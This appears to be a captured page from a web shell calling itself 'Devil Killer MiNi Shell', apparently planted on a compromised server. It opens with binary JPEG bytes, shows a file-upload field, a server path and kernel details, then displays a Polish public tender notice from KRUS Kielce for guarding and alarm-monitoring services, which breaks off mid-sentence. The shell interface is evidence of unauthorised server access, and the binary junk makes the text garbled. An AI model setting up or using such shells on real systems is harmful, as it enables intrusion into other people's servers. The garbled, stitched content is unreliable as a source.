JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230824/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20230824/0036654301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie przez Wykonawcę usług w zakresie: fizycznej ochrony osób i mienia, monitoringu i konserwacji systemów alarmowych w KRUS OR w Kielcach oraz podległych Placówkach Terenowych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Kasa Rolniczego Ubezpieczenia Społecznego Oddział Regionalny w Kielcach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 01251326200203</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wojska Polskiego 65B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kielce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">25-389</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">41 348 19 00, 41 348 19 04</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">41 348 19 20</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kielce@krus.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.krus.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - Zakład Ubezpieczeń Społecznych lub Kasa Rolniczego Ubezpieczenia Społecznego oraz zarządzane przez nie fundusze</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Ubezpieczenia rolnicze </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie przez Wykonawcę usług w zakresie: fizycznej ochrony osób i mienia, monitoringu i konserwacji systemów alarmowych w KRUS OR w Kielcach oraz podległych Placówkach Terenowych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0b83134a-426a-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00366543</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00125277/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Świadczenie przez Wykonawcę usług w zakresie fizycznej ochrony osób i mienia, monitoringu i konserwacji systemów alarmowych w siedzibie KRUS OR w Kielcach i podległych placówkach terenowych.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.krus.gov.pl/krus_kielce <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.krus.gov.pl/krus_kielce</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja między Zamawiającym, a Wykonawcami w niniejszym postępowaniu odbywa się przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (tj. Dz. U. z 2020 r. poz. 344), za pośrednictwem:<br/>- portalu e-Usług SmartPZP (zwanym dalej „Systemem”), dostępnym pod adresem: https://ezamowienia.krus.gov.pl/krus_kielce, za pomocą którego odbywa się składanie ofert lub ich wycofanie, zadawanie pytań przez Wykonawcę i udzielanie odpowiedzi przez Zamawiającego, wymiana informacji oraz przekazywanie dokumentów i oświadczeń w niniejszym postępowaniu o zamówienie publiczne, <br/>- poczty elektronicznej pod adresem: kielce@krus.gov.pl – w przypadku awarii lub przerwy technicznej w działaniu Systemu z zastrzeżeniem, że składanie ofert wraz z załącznikami odbywa się wyłącznie przy użyciu Systemu<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto w Systemie (https://ezamowienia.krus.gov.pl/krus_kielce). Wykonawca do założenia konta w Systemie potrzebuje kwalifikowanego podpisu elektronicznego lub podpisu zaufanego lub podpisu osobistego (e-dowód). Wykonawca rejestruje się w Systemie wykonując czynności opisane w Instrukcji obsługi Portalu e-Usług SmartPZP („Instrukcja użytkownika Wykonawcy SMARTPZP)”, zwanej dalej Instrukcją.<br/>Instrukcja dostępna jest pod adresem: https://ezamowienia.krus.gov.pl/krus_kielce/elearning <br/>3. Wykonawca rejestrując się musi zaakceptować warunki korzystania z Systemu, określone w Regulaminie Portalu e-Usług zamieszczonym pod wyżej opisanym adresem.<br/>4. Korzystanie z Systemu jest bezpłatne. Podgląd i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta w Systemie, a tym samym logowania się do Systemu.<br/>5. Minimalne wymagania techniczne: <br/>a) Stały dostęp do sieci Internet o gwarantowanej przepustowości, nie mniejszej niż 1 Mb/s <br/>b) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 3 GB RAM, procesor 1500 MHz lub lepszy, jeden z systemów operacyjnych Linux Kernel 4.0, Windows 7 i MacOS 10.12 - lub ich nowsze wersje <br/>c) Przeglądarki internetowe: <br/>–	Mozzilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze lub Opera ver. 58 <br/>i późniejsze, Microsoft Edge ver 18 i późniejsze, Internet Explorer 11 <br/>–	Lista zalecanych przeglądarek internetowych: Google Chrome, Mozilla Firefox, Opera.<br/>Zalecane jest używanie najnowszych wersji przeglądarek <br/>d) Dodatkowe oprogramowanie <br/>–	zainstalowane środowisko Java w wersji min. 1.8 (jre) <br/>–	w przypadku przeglądarek Opera, Chrome i Firefox należy doinstalować dodatek do przeglądarki Szafir SDK Web <br/>–	oprogramowania SzafirHost w systemie operacyjnym. <br/>6. Wykonawca wykorzystujący elektroniczny kwalifikowany podpis do podpisu oferty i innych dokumentów w postępowaniu w formacie (PAdES, XAdES), typ (zewnętrzny, wewnętrzny) zobowiązany jest dołączyć do Systemu uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny):<br/>1)	dokumenty w formacie „.pdf” należy podpisywać tylko formatem PAdES,<br/>2)	dokumenty w innym formacie niż „.pdf” należy podpisywać formatem XAdES.<br/>7. Dokumenty wymagane przez Zamawiającego opisane w SWZ powinny być załączone w formie plików <br/>w formacie odpowiednio: .xml, .pdf, .docx, .xls, .xlsx, Zamawiający dopuszcza również następujące formaty: .png, .jpg, .jpeg, .gif, .ppt, .pptx, .odt, .ods, .odp, .odf, .zip, .rar, .7zip, .txt, .ath, .xml., .dwg, <br/>. xades, .tar, .7z, .eml, .msg.<br/>W przypadku przesłania oferty w innym formacie niż wyżej wymienione, Wykonawca powinien spakować plik do formatu .zip oraz wskazać nazwę oprogramowania i stronę z której można w sposób legalny, darmowy dla użytku instytucji publicznych pobrać oprogramowanie bez dodatkowych rejestracji lub aktywacji, służące do odczytu danego formatu.<br/>8. Maksymalny rozmiar pojedynczego pliku przesyłanego za pośrednictwem Systemu wynosi 100 MB.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.krus.gov.pl/krus_kielce</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna RODO znajduje się w treści SWZ - Rozdział XXVIII.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. W przypadku korzystania przez osobę, której dane są przetwarzane przez Zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1-3 RODO, Zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub zakończenia postępowania o udzielenie zamówienia. <br/>2. Skorzystania przez osobę, której dane osobowe dotyczą, z uprawnienia, o którym mowa w art. 15 RODO (tj. uprawnienia do sprostowania lub uzupełnienia danych osobowych) nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą, a także naruszać integralności protokołu postępowania oraz jego załączników.<br/>3. Zgłoszenie w niniejszym postępowaniu o zamówienie wymaga żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>4. Wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO, spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia Zamawiający nie udostępni tych danych, chyba, że zajdą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">0500-OP.261.02.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest świadczenie usługi polegającej na:<br/>1)	kompleksowej, całodobowej, jednoosobowej ochronie osób i mienia w formie stałej, bezpośredniej ochrony fizycznej oraz monitoringu wizyjnego w obiekcie będącym siedzibą KRUS Oddział Regionalny w Kielcach, ul. Wojska Polskiego 65 B wraz z przyległym do budynku, ogrodzonym terenem – prowadzonej zgodnie z przepisami ustawy z dnia 22 sierpnia 1997 r. <br/>o ochronie osób i mienia (tj. Dz. U. z 2021 r. poz. 1995) oraz aktów wykonawczych wydanych <br/>na jej podstawie;<br/>2)	całodobowym monitoringu systemów alarmowych, tj.: Systemu Sygnalizacji Włamania i Napadu (SSWiN), Systemu Sygnalizacji Pożaru (SAP, SSP) w obiektach/siedzibach jednostek organizacyjnych KRUS, realizowanym w oparciu o istniejące, zainstalowane urządzenia alarmowe;<br/>3)	konserwacji i naprawie systemów alarmowych antywłamaniowych i systemu sygnalizacji pożaru, znajdujących się w jednostkach organizacyjnych KRUS.<br/>2. Szczegółowy opis i zakres przedmiotu zamówienia zawiera następująca dokumentacja:<br/>–	Załącznik nr 1 do SWZ – Szczegółowy Opis przedmiotu Zamówienia, będący jednocześnie Załącznikiem nr 1 do Wzoru Umowy,<br/>–	Załącznik nr 13 do SWZ – Wzór Umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79711000-1 - Usługi nadzoru przy użyciu alarmu</p> <p class="mb-0">50000000-5 - Usługi naprawcze i konserwacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Personel Wykonawcy skierowany do fizycznej ochrony osób i mienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Na podstawie art. 112 ustawy Pzp o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale XI pkt 1 oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu określone w niniejszym Rozdziale dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym <br/>	Zamawiający nie określa szczegółowego warunku w przedmiotowym zakresie <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający wymaga, aby Wykonawca posiadał aktualną koncesję wydaną przez Ministra Spraw Wewnętrznych i Administracji określającą formę i zakres usług ochrony osób i mienia zgodnie <br/>z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (tj.: Dz. U. z 2021 r. poz. 1995). <br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia przedmiotowy warunek zostanie uznany za spełniony jeżeli przynajmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane.<br/>3)	sytuacji ekonomicznej lub finansowej<br/>Wykonawca w celu spełnienia warunku dotyczącego sytuacji ekonomicznej i finansowej zobowiązany jest wykazać, że jest ubezpieczony od odpowiedzialności cywilnej (OC) w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną w wysokości co najmniej <br/>600 000,00 zł.<br/>Uwaga! <br/>Wykonawca wybrany do realizacji zamówienia musi być objęty ubezpieczeniem odpowiedzialności cywilnej w zakresie prowadzonej działalności na okres objęty umową, na sumę gwarancyjną nie mniejszą niż 1 000 000,00 zł. Najpóźniej w dniu zawarcia umowy Wykonawca przedstawi Zamawiającemu poświadczoną kopię dokumentu OC na wskazaną sumę gwarancyjną.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia przedmiotowy warunek zostanie uznany za spełniony jeżeli przynajmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia spełni ten warunek.<br/>	Zamawiający nie określa szczegółowego warunku w odniesieniu do warunku dotyczącego sytuacji finansowej.<br/>4) zdolności technicznej lub zawodowej<br/>a)	Wykonawca przystępujący do zamówienia musi wykazać (udokumentować), że wykaże, <br/>że ma odpowiednią wiedzę i doświadczenie w wykonaniu lub wykonywaniu usługi będącej przedmiotem zamówienia tzn. obejmującej usługi o tym samym rodzaju, stanowiące przedmiot niniejszego postępowania. Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- <br/>w tym okresie wykonał lub wykonuje należycie:<br/>–	co najmniej 2 (dwie) usługi (wykonane lub wykonywane przez Wykonawcę <br/>na podstawie odrębnych umów) o tym samym rodzaju co przedmiot zamówienia <br/>i o wartości co najmniej 200 000,00 zł brutto (słownie: dwieście tysięcy złotych 00/100) każda <br/>z nich z podaniem rodzaju (przedmiotu), wartości, daty, miejsca wykonania i podmiotu <br/>na rzecz którego usługa została wykonana lub jest wykonywana wraz z załączeniem dowodu określającego, że wskazana usługa została wykonana lub jest wykonywana należycie. <br/>Okres wykonywania każdej ze wskazanych usług nie może być krótszy niż 12 miesięcy.<br/>W przypadku usług wykonywanych (nie zakończonych) Zamawiający uzna warunek za spełniony, jeżeli część zamówienia już faktycznie wykonana przez Wykonawcę wyniesie minimum 12 miesięcy <br/>i jej wartość wyniesie nie mniej niż 200 000,00 zł brutto.<br/>–	dowodami potwierdzającymi, że usługi zostały wykonane lub są wykonywane należycie <br/>są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane lub są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest <br/>w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty,<br/>–	w celu wykazania zdolności zawodowej nie można sumować kilku oddzielnych usług o mniejszej wartości, aby uzyskać wartość wymaganą w tiret pierwszym,<br/>–	Zamawiający uzna warunek udziału za spełniony, jeżeli Wykonawca na wezwanie złoży Załącznik nr 8 do SWZ Wykaz usług.<br/>b)	Wykonawca w zakresie kwalifikacji zawodowych spełni warunek, jeżeli wykaże, że:<br/>	dysponuje minimum 5 osobami posiadającymi co najmniej 6 miesięczny staż na stanowisku pracownika ochrony fizycznej, nie skazanymi prawomocnym wyrokiem za przestępstwo umyślne <br/>i nie toczy się przeciwko nim postępowanie karne o takie przestępstwo, w tym wykaże minimum <br/>1 kwalifikowanego pracownika ochrony do realizacji zadań bezpośredniej ochrony fizycznej obiektu Zamawiającego,<br/>W przypadku skierowania przez Wykonawcę większej liczby kwalifikowanych pracowników ochrony oferta Wykonawcy będzie premiowana dodatkowymi punktami zgodnie z kryteriami opisanymi <br/>w Rozdziale XXIV SWZ.<br/>Zamawiający wyjaśnia, że kwalifikowany pracownik ochrony to pracownik ochrony, który posiada legitymację kwalifikowanego pracownika ochrony fizycznej i wpisany jest na listę kwalifikowanych pracowników ochrony fizycznej, prowadzoną przez Komendanta Głównego Policji.<br/>	dysponuje pracownikami ochrony do realizacji zadań stałej ochrony fizycznej obiektu, którzy posiadają uprawnienia do posługiwania się bronią palną (pracownicy grup interwencyjnych). Zamawiający wymaga, aby Wykonawca dysponował minimum 1 dwuosobową grupą interwencyjną na terenie miast: Kielce, Busko-Zdrój, Jędrzejów, Kazimierza Wielka, Końskie, Opatów, Ostrowiec Świętokrzyski, Ożarów, Pińczów, Sandomierz, Starachowice, Staszów i Włoszczowa.<br/>c)	Wykonawca w zakresie potencjału technicznego musi wykazać, że dysponuje stacją/-ami monitorowania alarmów obejmującą/-ymi swoim zasięgiem obszar całego województwa świętokrzyskiego – Załącznik nr 10 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	Informacja z Krajowego Rejestru Karnego w zakresie:<br/>a)	art. 108 ust. 1 pkt 1 i 2 ustawy Pzp (Rozdział XI pkt 2 ppkt 1 i 2 SWZ);<br/>b)	art. 108 ust. 1 pkt 4 (Rozdział XI pkt 2 ppkt 4) – dotycząca orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego;<br/>- sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/>2)	Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków i opłat w zakresie art. 109 ust 1 pkt 1 ustawy Pzp (Rozdział XI pkt 4 ppkt 1 SWZ), wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem Zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności – w przypadku 